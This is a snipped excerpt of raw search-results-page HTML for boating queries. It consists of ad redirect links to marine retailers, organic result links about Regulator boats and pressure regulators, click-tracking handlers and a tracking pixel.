ss('http://www.google.com/aclk?sa=l&ai=CzRt2pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUOGQ56n-_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9CaZm6ZezO7GTgcZd4uIIHxpOmolaqeaIaX6Q&num=2&ctype=4&sig=AGiWqtywJmSLF1oaD69jRoVir8DA1qMhww&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats')" onmouseout="cs()" style="">Shop Boat Seats</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CqWudpchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUNHtnYX5_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9CaZm6ZezO7GTgcZd4uIIHxpOmolaqeaIaX6Q&num=2&ctype=4&sig=AGiWqtzPc2X9P-wQ-SLLlcHixif78kjFEQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(3); if (typeof efclk != 'undefined') efclk(3); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_1');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CqWudpchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUNHtnYX5_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9CaZm6ZezO7GTgcZd4uIIHxpOmolaqeaIaX6Q&num=2&ctype=4&sig=AGiWqtzPc2X9P-wQ-SLLlcHixif78kjFEQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool')" onmouseout="cs()" style="">Boat Cover Selection Tool</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CSN46pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUJyA1YgHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&ctype=4&sig=AGiWqtyUY1GQ2YCCgtmxFxb3AL4rlERjGg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(3); if (typeof efclk != 'undefined') efclk(3); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_1');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CSN46pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUJyA1YgHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&ctype=4&sig=AGiWqtyUY1GQ2YCCgtmxFxb3AL4rlERjGg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture')" onmouseout="cs()" style="">Shop Pontoon Furniture</a>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CWUGJpchBTdWqK4W4gwe93_DODu2R_78Br7bGshWQqMEHEAMg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQK98dWE5OCwPqoEH0_Quj5QmXozu1E4ghtMgAhejaPltk8amgDZ7pU62iw&num=3&sig=AGiWqtwEl-kAbCUEwTlIYfGscY8kCbKy7w&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(34); if (typeof efclk != 'undefined') efclk(34); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_2');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CWUGJpchBTdWqK4W4gwe93_DODu2R_78Br7bGshWQqMEHEAMg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQK98dWE5OCwPqoEH0_Quj5QmXozu1E4ghtMgAhejaPltk8amgDZ7pU62iw&num=3&sig=AGiWqtwEl-kAbCUEwTlIYfGscY8kCbKy7w&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(34); if (typeof efclk != 'undefined') efclk(34); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_2');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CwvMapchBTdWqK4W4gwe93_DODpyQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_QmndlmX0zu1E4ggpNTyeN735ZrP315xQ&num=4&sig=AGiWqtyATQ9eFmfuYLlv_wfr636ePByh4Q&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(26); if (typeof efclk != 'undefined') efclk(26); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_3');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CwvMapchBTdWqK4W4gwe93_DODpyQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_QmndlmX0zu1E4ggpNTyeN735ZrP315xQ&num=4&sig=AGiWqtyATQ9eFmfuYLlv_wfr636ePByh4Q&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(26); if (typeof efclk != 'undefined') efclk(26); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_3');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=C8JicpchBTdWqK4W4gwe93_DODoWC_sYBtYbU7gm9qYcHEAUg-_6BAygFUILDy_j-_____wFgyYajh9SjgBDIAQGqBBtP0No8Z5l8O7vpOwPRT_b64k91mNIub4jkZZw&num=5&sig=AGiWqtxOke1TlNg6wEdR-afxZM4XU5Ch6Q&adurl=http://www.pressure-controls.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(93); if (typeof efclk != 'undefined') efclk(93); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_4');" class="nu" onmouseover="return ss('www.pressure-controls.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=C8JicpchBTdWqK4W4gwe93_DODoWC_sYBtYbU7gm9qYcHEAUg-_6BAygFUILDy_j-_____wFgyYajh9SjgBDIAQGqBBtP0No8Z5l8O7vpOwPRT_b64k91mNIub4jkZZw&num=5&sig=AGiWqtxOke1TlNg6wEdR-afxZM4XU5Ch6Q&adurl=http://www.pressure-controls.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(93); if (typeof efclk != 'undefined') efclk(93); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_4');" class="nu" onmouseover="return ss('www.pressure-controls.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<td>

<a id="r1_t" href="http://www.regulatormarine.com/32fs.html"
onmousedown="return fp(this,{en:'in',io:'0',b:'a002',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r2_t" href="http://www.reel-time.com/forum/showthread.php?t=41911"
onmousedown="return fp(this,{en:'te',io:'0',b:'a003',tp:'d',ec:'1',ex:'tsrc%3Dvnru'},'false',0)" class="title txt_lg" target="_blank" >99 <b>
...[SNIP]...
<td>

<a id="r3_t" href="http://www.comstockyachtsales.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a004',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >New Jersey <b>
...[SNIP]...
<td>

<a id="r4_t" href="http://www.comstockyachtsales.com/aboutus.asp"
onmousedown="return fp(this,{en:'in',io:'0',b:'a005',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >New Jersey <b>
...[SNIP]...
<td>

<a id="r5_t" href="http://grillautomotivebestbuy.co.cc/info-Camco_40053_RV_Brass_Water_Pressure_Regulator-B000BQ7WH2.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a006',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >Camco 40053 RV Brass Water Pressure <b>
...[SNIP]...
<td>

<a id="r6_t" href="http://www.fishingandboats.com/boat-regulator.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a007',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >Install a <b>
...[SNIP]...
<td>

<a id="r7_t" href="http://www.boatworldusa.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a008',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r8_t" href="http://www.yachtworld.com/boats/category/type/Regulator"
onmousedown="return fp(this,{en:'te',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r9_t" href="http://www.regulatormarinegear.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CVuNYpchBTdWqK4W4gwe93_DODsmNwHPR0I-RDdbRiAcQASD7_oEDKAVQlbmT_wZgyYajh9SjgBDIAQGpAkmm4aFRvbo-qgQbT9Daa1SZeDu76TsD0U_2-uJPdZjSLm-I5GWE&num=1&sig=AGiWqtyFyPkzzoWfRtEXai8ZbCJHo5AGWQ&adurl=http://www.pharmalinkconsulting.co.uk" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(77); if (typeof efclk != 'undefined') efclk(77); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_0');" class="nu" onmouseover="return ss('www.pharmalinkconsulting.co.uk')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CVuNYpchBTdWqK4W4gwe93_DODsmNwHPR0I-RDdbRiAcQASD7_oEDKAVQlbmT_wZgyYajh9SjgBDIAQGpAkmm4aFRvbo-qgQbT9Daa1SZeDu76TsD0U_2-uJPdZjSLm-I5GWE&num=1&sig=AGiWqtyFyPkzzoWfRtEXai8ZbCJHo5AGWQ&adurl=http://www.pharmalinkconsulting.co.uk" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(77); if (typeof efclk != 'undefined') efclk(77); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_0');" class="nu" onmouseover="return ss('www.pharmalinkconsulting.co.uk')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C3e0TpchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUIfc5pcHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&sig=AGiWqtxuQz3oe5Wp-Esxdy-74Scso2m8zw&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(99); if (typeof efclk != 'undefined') efclk(99); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_1');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br/>
<a href="http://www.google.com/aclk?sa=l&ai=C3e0TpchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUIfc5pcHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&sig=AGiWqtxuQz3oe5Wp-Esxdy-74Scso2m8zw&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(99); if (typeof efclk != 'undefined') efclk(99); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_1');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CmrS6pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUM_1s-kEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&ctype=4&sig=AGiWqtzsolBc3httcVr9-wCCSaQ859OjQg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(99); if (typeof efclk != 'undefined') efclk(99); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_1');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CmrS6pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUM_1s-kEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&ctype=4&sig=AGiWqtzsolBc3httcVr9-wCCSaQ859OjQg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing')" onmouseout="cs()" style="">Winterizing</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CzRt2pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUOGQ56n-_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9CaZm6ZezO7GTgcZd4uIIHxpOmolaqeaIaX6Q&num=2&ctype=4&sig=AGiWqtywJmSLF1oaD69jRoVir8DA1qMhww&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(99); if (typeof efclk != 'undefined') efclk(99); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_1');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CzRt2pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUOGQ56n-_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9CaZm6ZezO7GTgcZd4uIIHxpOmolaqeaIaX6Q&num=2&ctype=4&sig=AGiWqtywJmSLF1oaD69jRoVir8DA1qMhww&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats')" onmouseout="cs()" style="">Shop Boat Seats</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CqWudpchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUNHtnYX5_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9CaZm6ZezO7GTgcZd4uIIHxpOmolaqeaIaX6Q&num=2&ctype=4&sig=AGiWqtzPc2X9P-wQ-SLLlcHixif78kjFEQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(99); if (typeof efclk != 'undefined') efclk(99); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_1');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CqWudpchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUNHtnYX5_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9CaZm6ZezO7GTgcZd4uIIHxpOmolaqeaIaX6Q&num=2&ctype=4&sig=AGiWqtzPc2X9P-wQ-SLLlcHixif78kjFEQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool')" onmouseout="cs()" style="">Boat Cover Selection Tool</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CSN46pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUJyA1YgHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&ctype=4&sig=AGiWqtyUY1GQ2YCCgtmxFxb3AL4rlERjGg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(99); if (typeof efclk != 'undefined') efclk(99); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_1');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CSN46pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUJyA1YgHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&ctype=4&sig=AGiWqtyUY1GQ2YCCgtmxFxb3AL4rlERjGg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture')" onmouseout="cs()" style="">Shop Pontoon Furniture</a>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CWUGJpchBTdWqK4W4gwe93_DODu2R_78Br7bGshWQqMEHEAMg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQK98dWE5OCwPqoEH0_Quj5QmXozu1E4ghtMgAhejaPltk8amgDZ7pU62iw&num=3&sig=AGiWqtwEl-kAbCUEwTlIYfGscY8kCbKy7w&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(87); if (typeof efclk != 'undefined') efclk(87); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_2');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CWUGJpchBTdWqK4W4gwe93_DODu2R_78Br7bGshWQqMEHEAMg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQK98dWE5OCwPqoEH0_Quj5QmXozu1E4ghtMgAhejaPltk8amgDZ7pU62iw&num=3&sig=AGiWqtwEl-kAbCUEwTlIYfGscY8kCbKy7w&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(87); if (typeof efclk != 'undefined') efclk(87); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_2');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CwvMapchBTdWqK4W4gwe93_DODpyQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_QmndlmX0zu1E4ggpNTyeN735ZrP315xQ&num=4&sig=AGiWqtyATQ9eFmfuYLlv_wfr636ePByh4Q&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(27); if (typeof efclk != 'undefined') efclk(27); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_3');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CwvMapchBTdWqK4W4gwe93_DODpyQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_QmndlmX0zu1E4ggpNTyeN735ZrP315xQ&num=4&sig=AGiWqtyATQ9eFmfuYLlv_wfr636ePByh4Q&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(27); if (typeof efclk != 'undefined') efclk(27); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_3');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=C8JicpchBTdWqK4W4gwe93_DODoWC_sYBtYbU7gm9qYcHEAUg-_6BAygFUILDy_j-_____wFgyYajh9SjgBDIAQGqBBtP0No8Z5l8O7vpOwPRT_b64k91mNIub4jkZZw&num=5&sig=AGiWqtxOke1TlNg6wEdR-afxZM4XU5Ch6Q&adurl=http://www.pressure-controls.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(53); if (typeof efclk != 'undefined') efclk(53); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_4');" class="nu" onmouseover="return ss('www.pressure-controls.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=C8JicpchBTdWqK4W4gwe93_DODoWC_sYBtYbU7gm9qYcHEAUg-_6BAygFUILDy_j-_____wFgyYajh9SjgBDIAQGqBBtP0No8Z5l8O7vpOwPRT_b64k91mNIub4jkZZw&num=5&sig=AGiWqtxOke1TlNg6wEdR-afxZM4XU5Ch6Q&adurl=http://www.pressure-controls.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(53); if (typeof efclk != 'undefined') efclk(53); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_4');" class="nu" onmouseover="return ss('www.pressure-controls.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
